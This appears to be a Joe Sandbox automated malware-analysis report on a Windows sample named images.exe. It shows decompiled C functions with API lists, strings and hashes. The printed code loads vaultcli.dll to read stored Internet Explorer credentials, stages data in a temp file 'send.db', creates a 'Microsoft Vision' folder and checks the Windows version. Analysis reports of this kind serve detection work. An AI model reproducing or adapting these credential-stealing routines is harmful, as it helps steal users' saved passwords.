												asm("movaps xmm0, [0x4449c0]");
												asm("movups [ebp-0x60], xmm0");
												E00433264( &_v100, E00433412( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E00435A2D(_v68);
												_v68 = _t234;
												E00433264( &_v96, E00433412( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E00435A2D(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E00433264( &_v84, E00433412( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E00435A2D(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00431EB9(_t235,  &_v100);
												E00431EEF(_t186);
												E0043138F( &_v100);
											}
											E00435A2D(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E00431000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E00433412( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E00433075( &_v24, E00433412( &_v48, L"Internet Explorer"));
											E00435A2D(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x4449c0]");
												asm("movups [ebp-0x60], xmm0");
												E00433264( &_v100, E00433412( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E00435A2D(_v52);
												_v52 = _t234;
												E00433264( &_v96, E00433412( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E00435A2D(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E00433264( &_v92, E00433412( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E00435A2D(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00431EB9(_t235,  &_v100);
												E00431EEF(_t186);
												E0043138F( &_v100);
											}
											E00435A2D(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0));
				E00435A2D(_t234);
				E00435A2D(0);
				return E00435A2D(0);
			}







































                                      0x00439eb1
                                      0x00439eb3
                                      0x00439eb6
                                      0x00439eb8
                                      0x00439ebb
                                      0x00439ebe
                                      0x00439ec1
                                      0x00439ec4
                                      0x00439ec7
                                      0x00439ed1
                                      0x00439eda
                                      0x00439edb
                                      0x00439edc
                                      0x00439ee9
                                      0x00439ef2
                                      0x00439ef6
                                      0x00439ef7
                                      0x00439efc
                                      0x00439f07
                                      0x00439f10
                                      0x00439f12
                                      0x00439f18
                                      0x00439f1b
                                      0x00439f1e
                                      0x00439f21
                                      0x00439f21
                                      0x00439f26
                                      0x00439f28
                                      0x00439f2f
                                      0x0043a053
                                      0x0043a054
                                      0x0043a057
                                      0x0043a05c
                                      0x0043a05f
                                      0x0043a061
                                      0x0043a070
                                      0x0043a086
                                      0x0043a090
                                      0x0043a095
                                      0x0043a098
                                      0x0043a09a
                                      0x0043a0a6
                                      0x0043a0ad
                                      0x0043a0c1
                                      0x0043a0c9
                                      0x0043a0d7
                                      0x0043a0e4
                                      0x0043a0ec
                                      0x0043a0f4
                                      0x0043a0f8
                                      0x0043a101
                                      0x0043a10b
                                      0x0043a111
                                      0x0043a113
                                      0x0043a11e
                                      0x0043a124
                                      0x0043a131
                                      0x0043a139
                                      0x0043a13e
                                      0x0043a13e
                                      0x0043a141
                                      0x0043a14a
                                      0x0043a151
                                      0x0043a159
                                      0x0043a159
                                      0x0043a161
                                      0x0043a166
                                      0x00000000
                                      0x0043a166
                                      0x00439f35
                                      0x00439f38
                                      0x00439f3b
                                      0x00439f3c
                                      0x00439f3f
                                      0x00439f44
                                      0x00439f49
                                      0x00439f55
                                      0x00439f6b
                                      0x00439f75
                                      0x00439f7a
                                      0x00439f7f
                                      0x00439f85
                                      0x00439f8b
                                      0x00439f92
                                      0x00439fa6
                                      0x00439fae
                                      0x00439fbc
                                      0x00439fc9
                                      0x00439fd1
                                      0x00439fd9
                                      0x00439fdc
                                      0x00439fdd
                                      0x00439fde
                                      0x00439fdf
                                      0x00439fe0
                                      0x00439fe3
                                      0x00439fe6
                                      0x00439fe9
                                      0x00439fea
                                      0x00439ff5
                                      0x00439ffd
                                      0x0043a010
                                      0x0043a018
                                      0x0043a01d
                                      0x0043a01d
                                      0x0043a020
                                      0x0043a029
                                      0x0043a030
                                      0x0043a038
                                      0x0043a038
                                      0x0043a040
                                      0x0043a045
                                      0x0043a169
                                      0x0043a169
                                      0x0043a169
                                      0x00439f49
                                      0x0043a16f
                                      0x0043a173
                                      0x0043a174
                                      0x0043a178
                                      0x0043a17b
                                      0x0043a184
                                      0x0043a184
                                      0x00439f12
                                      0x00439f07
                                      0x00439ee9
                                      0x0043a18b
                                      0x0043a190
                                      0x0043a190
                                      0x0043a19a
                                      0x0043a1a0
                                      0x0043a1a0
                                      0x0043a1ac
                                      0x0043a1b4
                                      0x0043a1bb
                                      0x0043a1cb

                                      APIs
                                        • Part of subcall function 0043A1FF: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0043A207
                                      • FreeLibrary.KERNEL32(?), ref: 0043A1AC
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433075: lstrcmpW.KERNEL32(?,?), ref: 0043307F
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                      • String ID: 4$8$Internet Explorer
                                      • API String ID: 708496175-747916358
                                      • Opcode ID: 3c4322b67de8ebc5cacba07c452e2559112fbb2b6ce99fb86eb22c9d67367b44
                                      • Instruction ID: 6f9550cf1afbcc4934a44d76ce0573cadb2561ed40d24f0eee435d9f13fd994d
                                      • Opcode Fuzzy Hash: 3c4322b67de8ebc5cacba07c452e2559112fbb2b6ce99fb86eb22c9d67367b44
                                      • Instruction Fuzzy Hash: 4CA15171D00219ABCF04EFE6D8869EEBB79FF18304F10511AF411A7252DB38AE51CB98
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043D9DD, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0043D9DD() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}
















                                      0x0043d9eb
                                      0x0043d9f5
                                      0x0043d9fd
                                      0x0043da1c
                                      0x0043da1e
                                      0x0043da25
                                      0x00000000
                                      0x0043da2b
                                      0x0043da2b
                                      0x0043da30
                                      0x0043daef
                                      0x0043db00
                                      0x0043db30
                                      0x0043db7d
                                      0x00000000
                                      0x0043db88
                                      0x0043db92
                                      0x0043db92
                                      0x0043db32
                                      0x0043db32
                                      0x0043db3a
                                      0x0043db4a
                                      0x0043db59
                                      0x0043db69
                                      0x00000000
                                      0x0043db6b
                                      0x0043db75
                                      0x0043db75
                                      0x0043db5b
                                      0x0043db65
                                      0x0043db65
                                      0x0043db4c
                                      0x0043db56
                                      0x0043db56
                                      0x0043db3c
                                      0x0043db46
                                      0x0043db46
                                      0x0043db3a
                                      0x0043db02
                                      0x0043db09
                                      0x0043db1c
                                      0x00000000
                                      0x0043db1e
                                      0x0043db28
                                      0x0043db28
                                      0x0043db0b
                                      0x0043db15
                                      0x0043db15
                                      0x0043db09
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043da36
                                      0x0043da3d
                                      0x0043da7e
                                      0x0043dacf
                                      0x00000000
                                      0x0043dae2
                                      0x0043daec
                                      0x0043daec
                                      0x0043da80
                                      0x0043da80
                                      0x0043da88
                                      0x0043da98
                                      0x0043daa7
                                      0x0043dab7
                                      0x00000000
                                      0x0043dabd
                                      0x0043dac7
                                      0x0043dac7
                                      0x0043daa9
                                      0x0043dab3
                                      0x0043dab3
                                      0x0043da9a
                                      0x0043daa4
                                      0x0043daa4
                                      0x0043da8a
                                      0x0043da94
                                      0x0043da94
                                      0x0043da88
                                      0x0043da3f
                                      0x0043da3f
                                      0x0043da47
                                      0x0043da57
                                      0x0043da66
                                      0x00000000
                                      0x0043da6c
                                      0x0043da76
                                      0x0043da76
                                      0x0043da59
                                      0x0043da63
                                      0x0043da63
                                      0x0043da49
                                      0x0043da53
                                      0x0043da53
                                      0x0043da47
                                      0x0043da3d
                                      0x0043da30
                                      0x0043d9ff
                                      0x0043da05
                                      0x0043da0d
                                      0x0043db93
                                      0x0043db96
                                      0x0043da13
                                      0x0043da1a
                                      0x00000000
                                      0x0043da1a
                                      0x0043da0d

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D9F5
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043DA05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 76a5073a7846edb3b91941b1267ab84e8671cd69c2d4c3e4bda9aba1e77d5e49
                                      • Instruction ID: 747af0454fbe69a88e51ea9e9e7a4920d5cf8f7954ec772202ecc1886c523a12
                                      • Opcode Fuzzy Hash: 76a5073a7846edb3b91941b1267ab84e8671cd69c2d4c3e4bda9aba1e77d5e49
                                      • Instruction Fuzzy Hash: 9B416E30E0412C96DF248B55E9063FEB7B49B5974DF0418E6E545E02C1E6BCDEC4CAA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC4AF7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123UNIQUE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C:\ProgramData\images.exe
                                      • API String ID: 0-922034686
                                      • Opcode ID: 8d119e7b9cd8a656015095881c8660ad51bb9cd0e8d3dee76717ecc54d443f83
                                      • Instruction ID: 7a1ea7685bf1f23060a4978caa7ebd64af7ca901778254edea0504363b792e8d
                                      • Opcode Fuzzy Hash: 8d119e7b9cd8a656015095881c8660ad51bb9cd0e8d3dee76717ecc54d443f83
                                      • Instruction Fuzzy Hash: 24418271E04718ABCB29DF99DD95FAEBBB8EB89311B1040AEE514E7311D7708E40DB60
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00440FE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E00440FE0(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a5) {
				char _v7;
				signed int _v27;
				char _v31;
				short _v2079;
				void* _t47;

				_t42 = __edx;
				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
				_t47 = __ecx;
				E00431052( &_v2079, 0, 0x400);
				GetTempPathW(0x400,  &_v2079);
				lstrcatW( &_v2079, L"send.db");
				E00433264(_t47 + 4, E00433412( &_v7,  &_v2079));
				E00435A2D(_v7);
				_v27 = _v27 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v31 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E004334A6(E0043358E( &_v31, _t42, _t47 + 4), _v27, _a5);
				E00433492( &_v31);
				return _a5;
			}








                                      0x00440fe0
                                      0x00440fe4
                                      0x00441006
                                      0x00441008
                                      0x00441018
                                      0x0044102a
                                      0x00441045
                                      0x0044104d
                                      0x00441055
                                      0x0044105c
                                      0x0044105f
                                      0x00441067
                                      0x00441072
                                      0x0044107a
                                      0x00441085

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00441018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0044102A
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: 2dee113d007dbc1e4a49ce1cd0fb5ba9ad33c9e87c345235aea067790780af68
                                      • Instruction ID: 89eb01e09c6f539abe0a19581004ebdd3fca9d60b054e4d46065695f10915587
                                      • Opcode Fuzzy Hash: 2dee113d007dbc1e4a49ce1cd0fb5ba9ad33c9e87c345235aea067790780af68
                                      • Instruction Fuzzy Hash: D811C271D4011CABCB10EB61CC46BEE77BCAF59319F00C07AB505A2092EB789B46CBD4
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00440FEC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E00440FEC(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E00431052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E00433264(_t37 + 4, E00433412( &_v8,  &_v2080));
				E00435A2D(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E004334A6(E0043358E( &_v32, _t35, _t38),  *_t8, _a4);
				E00433492( &_v32);
				return _a4;
			}









                                      0x00440fec
                                      0x00441006
                                      0x00441008
                                      0x00441018
                                      0x0044102a
                                      0x00441036
                                      0x00441045
                                      0x0044104d
                                      0x00441055
                                      0x00441055
                                      0x0044105c
                                      0x0044105f
                                      0x00441067
                                      0x00441072
                                      0x0044107a
                                      0x00441085

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00441018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0044102A
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: d69e278e4eae55cae894796c14fea3a543b7c1ccbe61010c7385230e89fb903c
                                      • Instruction ID: a465b06a04a7b2a6dd2c024a2e9cb0a8a7c0e7c7191f66f5b9103bb802d70c3f
                                      • Opcode Fuzzy Hash: d69e278e4eae55cae894796c14fea3a543b7c1ccbe61010c7385230e89fb903c
                                      • Instruction Fuzzy Hash: C4015E71D0011DABDB10EB65DC46BEEB7BCAF59319F00C07AB505A2091EB789B46CB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 004413C8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 66%
                                      			E004413C8(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E00431052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E00433297( &_v8, _t34, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E004334A6(E0043358E( &_v32, _t34,  &_v8), 0, _a4);
				E00433492( &_v32);
				E00435A2D(_v8);
				return _a4;
			}








                                      0x004413c8
                                      0x004413e1
                                      0x004413e4
                                      0x004413f8
                                      0x0044140a
                                      0x0044141a
                                      0x00441425
                                      0x0044142c
                                      0x0044142f
                                      0x00441436
                                      0x00441441
                                      0x00441449
                                      0x00441451
                                      0x0044145b

                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004413F8
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0044140A
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderFreePathVirtuallstrcat
                                      • String ID: ;$\Microsoft Vision\
                                      • API String ID: 1529938272-253167065
                                      • Opcode ID: 80de5e38522ab86676474ed0b9dd8d51d73c11c07ae529424c69f0adc6d1ef85
                                      • Instruction ID: 2b8ce50dd8466d574f366dfbae1ec29780b3a7cb6f45f27ee4e5ced465d8f0e9
                                      • Opcode Fuzzy Hash: 80de5e38522ab86676474ed0b9dd8d51d73c11c07ae529424c69f0adc6d1ef85
                                      • Instruction Fuzzy Hash: 95012171D0011DBACB10EFA1ED49DDFBBB8AF19308F10415AB505A2091EB78AB45CBD4
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Function 0043D469, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0043D469() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}








                                      0x0043d477
                                      0x0043d481
                                      0x0043d489
                                      0x0043d4a4
                                      0x0043d4a4
                                      0x0043d4a9
                                      0x0043d4b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043d48b
                                      0x0043d491
                                      0x0043d499
                                      0x0043d4af
                                      0x0043d4b2
                                      0x0043d49b
                                      0x0043d4a2
                                      0x00000000
                                      0x0043d4a2
                                      0x0043d499

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D481
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043D491
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 9ef56fb0e0f5b73b35aafe0bd873d3effc046a983d631c6bdd3b4e3cda23049c
                                      • Instruction ID: 35e11eb3bd4c0c77c70e3f6ccdae3cce2d16abe06e2b311f24c821c253e48928
                                      • Opcode Fuzzy Hash: 9ef56fb0e0f5b73b35aafe0bd873d3effc046a983d631c6bdd3b4e3cda23049c
                                      • Instruction Fuzzy Hash: 1DE0D834E8020816DB296F75AD0B7D73BA85F96744F4800A5A686E01C1EAFCD902CADC
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043D4B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0043D4B8() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}








                                      0x0043d4c6
                                      0x0043d4d0
                                      0x0043d4d8
                                      0x0043d4f3
                                      0x0043d4fa
                                      0x00000000
                                      0x0043d4fc
                                      0x0043d503
                                      0x0043d503
                                      0x0043d4da
                                      0x0043d4e0
                                      0x0043d4e8
                                      0x0043d504
                                      0x0043d507
                                      0x0043d4ea
                                      0x0043d4f1
